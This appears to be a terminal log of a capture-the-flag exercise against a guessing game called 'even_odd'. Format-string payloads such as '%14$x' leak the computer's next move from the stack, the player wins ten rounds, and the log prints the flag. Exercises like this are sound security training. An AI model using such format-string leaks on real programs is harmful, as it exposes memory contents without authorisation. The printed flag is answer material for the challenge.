%x %x %x %x %x %x %x %x
%9$x %10$x %11$x %12$x 
%13$x %14$x %15$x %16$x




admin2700@ML-RefVm-522423:/ctf/even_odd/W4Z6EY$ ./even_odd
Win 10 games to receive the prize!
Choose a positon: 
[1] Even
[2] Odd
> %14$x
Invalid selection
> 1
[# 1] Input a number between 1-10
> %14$x
That's not a valid move: 2
[# 1] Input a number between 1-10
> 2
Computer's move: 2
Your move: 2
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 2] Input a number between 1-10
> %14$x
That's not a valid move: a
[# 2] Input a number between 1-10
> 2
Computer's move: 10
Your move: 2
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 3] Input a number between 1-10
> %14$x
That's not a valid move: 8
[# 3] Input a number between 1-10
> 2
Computer's move: 8
Your move: 2
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 4] Input a number between 1-10
> %14$x
That's not a valid move: 4
[# 4] Input a number between 1-10
> 4
Computer's move: 4
Your move: 4
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 5] Input a number between 1-10
> %14$x
That's not a valid move: 4
[# 5] Input a number between 1-10
> 4
Computer's move: 4
Your move: 4
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 6] Input a number between 1-10
> %14$x
That's not a valid move: 3
[# 6] Input a number between 1-10
> 3
Computer's move: 3
Your move: 3
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 7] Input a number between 1-10
> %14$x
That's not a valid move: 8
[# 7] Input a number between 1-10
> 2
Computer's move: 8
Your move: 2
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 8] Input a number between 1-10
> %14$x
That's not a valid move: 3
[# 8] Input a number between 1-10
> 3
Computer's move: 3
Your move: 3
You won this round.
Play again?
[1] Yes
[2] No
> 1
[# 9] Input a number between 1-10
> %14$x
That's not a valid move: a
[# 9] Input a number between 1-10
> 2
Computer's move: 10
Your move: 2
You won this round.
Play again?
[1] Yes
[2] No
> 1
[#10] Input a number between 1-10
> %14$x
That's not a valid move: 6
[#10] Input a number between 1-10
> 2
Computer's move: 6
Your move: 2
You won this round.
Play again?
[1] Yes
[2] No
> 1
Maximum number of games reached
You won 10 times.
flag{free-bismuth}
Goodbye...